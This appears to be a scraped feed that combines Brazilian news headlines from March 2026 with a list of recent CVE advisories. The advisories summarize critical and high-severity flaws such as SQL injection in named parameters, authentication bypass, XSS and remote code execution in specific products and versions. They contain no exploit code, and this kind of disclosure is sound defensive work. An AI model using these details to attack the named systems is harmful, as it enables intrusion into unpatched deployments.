[12/03/2026 11:06] Zanin nega pedido para obrigar Câmara a instalar CPI do Master - Valor Econômico

[12/03/2026 08:14] PGR negocia delação com Daniel Vorcaro, dono do Banco Master: saiba o que está em jogo - ND Mais

[12/03/2026 11:33] Novo líder supremo do Irã promete vingança a 'mártires' e país divulga caligrafia oficial - CBN

[12/03/2026 08:58] Erika Hilton processa Ratinho por transfobia e pede R$ 10 milhões em indenização - Folha de S.Paulo

[12/03/2026 03:39] Centrão mapeia votos no STF para tentar soltar Daniel Vorcaro - Brasil 247

[12/03/2026 08:39] PF flagra segundo suplente de Alcolumbre sacando R$ 350 mil durante investigação sobre desvios no Dnit - O Globo

[12/03/2026 10:54] CPMI do INSS aprova convocações de cunhado e ex-noiva de Daniel Vorcaro - G1

[12/03/2026 09:15] Moraes pede que Itamaraty informe agenda diplomática de assessor de Trump - CNN Brasil

[12/03/2026 02:00] Morte em Ubá amplia alerta para a leptospirose em Minas - Estado de Minas

[12/03/2026 07:00] Quaest: 49% dizem que não confiam no STF; 43% afirmam que confiam - G1

[CVE-2025-63666] [Modified: 17-11-2025] [Analyzed] [V3.1 S9.8:CRITICAL] Tenda AC15 v15.03.05.18_multi) issues an authentication cookie that exposes the account password hash to the client and uses a short, low-entropy suffix as the session identifier. An attacker with network access or the ability to run JS in a victim browser can steal the cookie and replay it to access protected resources.

[CVE-2025-11366] [Modified: 14-11-2025] [Analyzed] [V3.1 S9.8:CRITICAL] N-central < 2025.4 is vulnerable to authentication bypass via path traversal

[CVE-2025-11367] [Modified: 14-11-2025] [Analyzed] [V3.1 S9.8:CRITICAL] The N-central Software Probe < 2025.4 is vulnerable to Remote Code Execution via deserialization

[CVE-2025-63289] [Modified: 05-01-2026] [Analyzed] [V3.1 S9.1:CRITICAL] Sogexia Android App Compile Affected SDK v35, Max SDK 32 and fixed in v36, was discovered to contain hardcoded encryption keys in the encryption_helper.dart file

[CVE-2025-63353] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] A vulnerability in FiberHome GPON ONU HG6145F1 RP4423 allows the device's factory default Wi-Fi password (WPA/WPA2 pre-shared key) to be predicted from the SSID. The device generates default passwords using a deterministic algorithm that derives the router passphrase from the SSID, enabling an attacker who can observe the SSID to predict the default password without authentication or user interaction.

[CVE-2025-64280] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] A SQL Injection Vulnerability in CentralSquare Community Development 19.5.7 allows attackers to inject SQL via the permit_no field.

[CVE-2025-64281] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] An Authentication Bypass issue in CentralSquare Community Development 19.5.7 allows attackers to access the admin panel without admin credentials.

[CVE-2025-11795] [Modified: 17-11-2025] [Analyzed] [V3.1 S7.8:HIGH] A maliciously crafted JPG file, when parsed through Autodesk 3ds Max, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process.

[CVE-2025-11797] [Modified: 17-11-2025] [Analyzed] [V3.1 S7.8:HIGH] A maliciously crafted DWG file, when parsed through Autodesk 3ds Max, can force a Use-After-Free vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.

[CVE-2025-13042] [Modified: 25-11-2025] [Analyzed] [V3.1 S8.8:HIGH] Inappropriate implementation in V8 in Google Chrome prior to 142.0.7444.166 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

[CVE-2025-52331] [Modified: 31-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] Cross-site scripting (XSS) vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation in the HTML report, which allows potentially malicious HTML tags to be injected into the report. User interaction is required. User must use the "generate report" functionality and open the report.

[CVE-2025-59491] [Modified: 31-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] Cross Site Scripting vulnerability in CentralSquare Community Development 19.5.7 via form fields.

[CVE-2025-63419] [Modified: 31-12-2025] [Analyzed] [V3.1 S6.1:MEDIUM] Cross Site Scripting (XSS) vulnerability in CrushFTP 11.3.6_48. The Web-Based Server has a feature where users can share files, the feature reflects the filename to an emailbody field with no sanitations leading to HTML Injection.

[CVE-2025-20378] [Modified: 03-12-2025] [Analyzed] [V3.1 S3.1:LOW] In Splunk Enterprise versions below 10.0.1, 9.4.5, 9.3.7, 9.2.9, and Splunk Cloud Platform versions below 10.0.2503.5, 9.3.2411.111, and 9.3.2408.121, an unauthenticated attacker could craft a malicious URL using the `return_to` parameter of the Splunk Web login endpoint. When an authenticated user visits the malicious URL, it could cause an unvalidated redirect to an external malicious site. To be successful, the attacker has to trick the victim into initiating a request from their browser. The unauthenticated attacker should not be able to exploit the vulnerability at will.

[CVE-2025-20379] [Modified: 03-12-2025] [Analyzed] [V3.1 S3.5:LOW] In Splunk Enterprise versions below 10.0.1, 9.4.5, 9.3.7, and 9.2.9 and Splunk Cloud Platform versions below 9.3.2411.116, 9.3.2408.124, 10.0.2503.5 and 10.1.2507.1, a low-privileged user that does not hold the “admin“ or “power“ Splunk roles could run a saved search with a risky command using the permissions of a higher-privileged user to bypass the SPL safeguards for risky commands. They could bypass these safeguards on the “/services/streams/search“ endpoint through its “q“ parameter by circumventing endpoint restrictions using character encoding in the REST path. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will.

[CVE-2025-60645] [Modified: 03-12-2025] [Analyzed] [V3.1 S6.5:MEDIUM] A Cross-Site Request Forgery (CSRF) in xxl-api v1.3.0 allows attackers to arbitrarily add users to the management module via a crafted GET request.

[CVE-2025-63811] [Modified: 31-12-2025] [Analyzed] [V3.1 S7.5:HIGH] An issue was discovered in dvsekhvalnov jose2go 1.5.0 thru 1.7.0 allowing an attacker to cause a Denial-of-Service (DoS) via crafted JSON Web Encryption (JWE) token with an exceptionally high compression ratio.

[CVE-2024-47866] [Modified: 31-12-2025] [Analyzed] [V3.1 S7.5:HIGH] Ceph is a distributed object, block, and file storage platform. In versions up to and including 19.2.3, using the argument `x-amz-copy-source` to put an object and specifying an empty string as its content leads to the RGW daemon crashing, resulting in a DoS attack. As of time of publication, no known patched versions exist.

[CVE-2025-13057] [Modified: 17-11-2025] [Analyzed] [V3.1 S6.3:MEDIUM] A vulnerability was identified in Campcodes School Fees Payment Management System 1.0. Impacted is an unknown function of the file /ajax.php?action=save_student. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used.

[CVE-2025-56385] [Modified: 31-12-2025] [Analyzed] [V3.1 S9.8:CRITICAL] A SQL injection vulnerability exists in the login functionality of WellSky Harmony version 4.1.0.2.83 within the 'xmHarmony.asp' endpoint. User-supplied input to the 'TXTUSERID' parameter is not properly sanitized before being incorporated into a SQL query. Successful authentication may lead to authentication bypass, data leakage, or full system compromise of backend database contents.